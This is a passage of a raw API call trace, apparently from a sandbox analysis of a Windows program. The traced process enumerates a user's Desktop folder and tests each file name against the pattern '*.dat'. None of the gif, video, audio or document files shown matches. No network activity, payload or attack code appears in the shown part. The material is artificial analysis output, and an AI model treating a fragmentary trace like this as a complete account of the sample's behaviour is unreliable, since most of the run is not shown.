out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.752] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpUsedDefaultChar=0x0) returned 44 [0110.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaba0 [0110.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaba0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.753] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*.dat") returned 0 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.753] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.753] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.753] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.753] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif" [0110.753] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.753] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.753] lstrcatW (in: lpString1="\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="\\PKW-syaNOG91rV.gif") returned="\\PKW-syaNOG91rV.gif" [0110.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea358 [0110.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x38ea358, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", lpUsedDefaultChar=0x0) returned 50 [0110.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea358 | out: hHeap=0x29a0000) returned 1 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.753] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.753] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*.dat") returned 0 [0110.754] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0110.754] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.754] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.754] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.754] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv" [0110.754] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.754] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.754] lstrcatW (in: lpString1="\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="\\QjzdslaoFnrvJ.flv") returned="\\QjzdslaoFnrvJ.flv" [0110.754] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.754] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea7d8 [0110.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x38ea7d8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", lpUsedDefaultChar=0x0) returned 49 [0110.754] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2810 [0110.754] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea7d8 | out: hHeap=0x29a0000) returned 1 [0110.754] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.754] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaba0 [0110.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaba0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.754] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0110.754] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*.dat") returned 0 [0110.754] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.754] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.754] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.754] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.754] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4" [0110.754] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.754] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.754] lstrcatW (in: lpString1="\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="\\QqfcEGsF2dGoVC.mp4") returned="\\QqfcEGsF2dGoVC.mp4" [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea358 [0110.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x38ea358, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", lpUsedDefaultChar=0x0) returned 50 [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0110.755] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea358 | out: hHeap=0x29a0000) returned 1 [0110.755] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab70 [0110.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab70, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.755] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab70 | out: hHeap=0x29a0000) returned 1 [0110.755] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*.dat") returned 0 [0110.755] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.755] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.755] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.755] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a" [0110.755] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.755] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.755] lstrcatW (in: lpString1="\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="\\SSkrbDuTIF.m4a") returned="\\SSkrbDuTIF.m4a" [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", lpUsedDefaultChar=0x0) returned 46 [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.755] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabb8 [0110.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabb8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.756] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*.dat") returned 0 [0110.756] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.756] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.756] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.756] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a" [0110.756] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.756] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.756] lstrcatW (in: lpString1="\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="\\StgqeHlfrw0.m4a") returned="\\StgqeHlfrw0.m4a" [0110.756] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.756] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", lpUsedDefaultChar=0x0) returned 47 [0110.756] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.756] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac18 [0110.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.756] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*.dat") returned 0 [0110.756] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.756] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.756] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.756] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SWeD.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt" [0110.756] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.756] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.756] lstrcatW (in: lpString1="\\", lpString2="SWeD.odt" | out: lpString1="\\SWeD.odt") returned="\\SWeD.odt" [0110.757] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaec8 [0110.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.757] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a3078 [0110.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x29a3078, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", lpUsedDefaultChar=0x0) returned 40 [0110.757] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.757] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac60 [0110.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac60, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.757] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*.dat") returned 0 [0110.757] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.757] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.758] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.758] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv" [0110.758] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.758] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.758] lstrcatW (in: lpString1="\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="\\UQk58h 9TQk7yvi7D.mkv") returned="\\UQk58h 9TQk7yvi7D.mkv" [0110.758] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.758] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea618 [0110.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x38ea618, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", lpUsedDefaultChar=0x0) returned 53 [0110.759] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2810 [0110.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.759] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac18 [0110.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac18, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.759] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*.dat") returned 0 [0110.759] FindNextFileW (in: hFindFile=0x7437e0, lpFindFileData=0x19cbe0 | out: 